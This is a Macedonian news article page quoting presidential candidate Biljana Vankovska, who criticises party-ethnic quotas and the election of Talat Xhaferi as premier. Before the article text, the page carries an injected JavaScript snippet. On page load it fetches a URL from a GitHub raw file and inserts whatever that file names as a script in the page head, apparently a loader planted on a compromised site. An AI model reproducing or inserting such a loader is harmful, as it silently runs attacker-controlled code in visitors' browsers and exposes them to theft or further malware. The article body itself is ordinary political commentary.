;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Ванковска: Партиско-етничките клучеви создаваат одиум во општеството - Антропол
АктуелноЛокално

Ванковска: Партиско-етничките клучеви создаваат одиум во општеството

  • Кандидатот за Претседател од Левица – Билјана Ванковска, вчера гостуваше во емисијата „Што мисли народот“ на телевизија „Стар“. Темата за избирање на терорист за премиер на државата како една од најактуелните изминатиов период беше начната, а Ванковска истакна дека партиско-етничките клучеви создаваат одиум во општеството. Таа потенцираше дека Џафери бил дезертер во две армии и нагласи дека неговиот избор е класична провокација. Во прилог ви го пренесуваме нејзиниот став:

Па нашите стари живееле заедно. Значи, овде никој не е дојденец. И тоа мораме да го имаме во предвид дека овие партиско-етнички клучеви се тие што создаваат одиум. Бидејќи, знаете кога Талат Џафери или било кој зад себе ви имал една солидна кариера на доблесен политичар, личност, човек со квалификации, со се, тогаш малкумина би замериле на етничката припадност.

Во овој случај тоа е доведено до апсурд!  Најуспешниот човек во политиката во Македонија, кој ги поминал сите позиции освен претседател на држава, е Талат Џафери, човек кој двапати бил дезертер од две армии, АРМ и ЈНА, што војничкиот код на чесност, на доверба, верност на Армијата и на државата е сериозна, да речам, работа, провокација и потоа учество во напад на сопствената држава, амнестија и сето тоа. 

Така што мислам дека понекогаш, дури и тој, таа нетрпеливост да речам етничка, не е етничка колку што е врзана за конкретни личности кои останаа над правото, над моралот. Не може да се замижи, сега стаса писмото од Советот на Европа од комесарката за човекови права потсети за Хашките случаи. Едвај некој се осмелува да го каже тоа од страв. Зошто? Тоа го прават политичарите од политичките партии, коалицискиот капацитет, што после изборите, ако им се замериме, може нема да сакаат со нас, ќе ни требаат бројки и додека тоа така оди, тоа остава белег. 

Тие живеат супер. Таму, во елитите, може пред нас се тепаат, додека зад сцена се дел на елита, си го делат колачот. А обичниот народ? Ние сега треба да се гледаме попреку. Зошто е некој од една или од друга група? Што нас не жртвуваат како колатерална жртва на нивните апетити? Во нормална држава, кога ние како граѓани би виделе дека живееме сиромашно, дека не ограбија, дека се што допреа запустеа, тогаш ние како граѓани велам Македонци, Албанци, Турци, Роми, Власи, што и да сме имаме заеднички проблем, не се ни меѓу себе проблеми.